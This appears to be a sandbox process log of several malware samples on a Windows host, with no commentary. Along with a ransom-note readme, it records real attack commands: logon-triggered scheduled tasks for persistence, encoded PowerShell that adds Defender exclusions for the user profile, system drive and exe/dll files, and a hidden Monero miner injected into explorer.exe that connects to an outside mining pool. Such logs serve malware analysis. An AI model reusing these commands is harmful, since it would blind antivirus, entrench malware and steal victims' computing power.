"C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\KeOBVFSB4.README.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2268 /prefetch:2
C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe
"C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe"
C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe
"C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe"
C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe
"C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe"
C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe
"C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4844 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4184 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap11042:198:7zEvent496
C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe
"C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe"
C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe
"C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe"
C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe
"C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe
"C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\KeOBVFSB4.README.txt
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\NightSkyReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2000 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5992 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap9493:190:7zEvent16973
C:\Users\Admin\Downloads\1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591.exe
"C:\Users\Admin\Downloads\1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591.exe"
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\d3302bdd3f92408cbf33680a6d9ab733 /t 3016 /p 408
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1496 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4996 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\" -spe -an -ai#7zMap31178:190:7zEvent3127
C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe
"C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5716 -ip 5716
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 1636
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6416 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap29677:190:7zEvent10921
C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
"C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
C:\Users\Admin\appdata\roaming\serverpatch.exe
"C:\Users\Admin\appdata\roaming\serverpatch.exe"
C:\Users\Admin\appdata\roaming\rtksmbs.exe
"C:\Users\Admin\appdata\roaming\rtksmbs.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
"C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
"C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
"C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth
C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
"C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe
"C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
C:\Users\Admin\appdata\roaming\rtksmbs.exe
"C:\Users\Admin\appdata\roaming\rtksmbs.exe"
C:\Users\Admin\appdata\roaming\serverpatch.exe
"C:\Users\Admin\appdata\roaming\serverpatch.exe"
C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe
"C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1772 /prefetch:8
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
"C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
"C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap17186:190:7zEvent19545
C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe
"C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe"
C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe
"C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe"
C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
"C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe
"C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Users\Admin\AppData\Roaming\zqawds.exe
C:\Users\Admin\AppData\Roaming\zqawds.exe
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
C:\Windows\explorer.exe
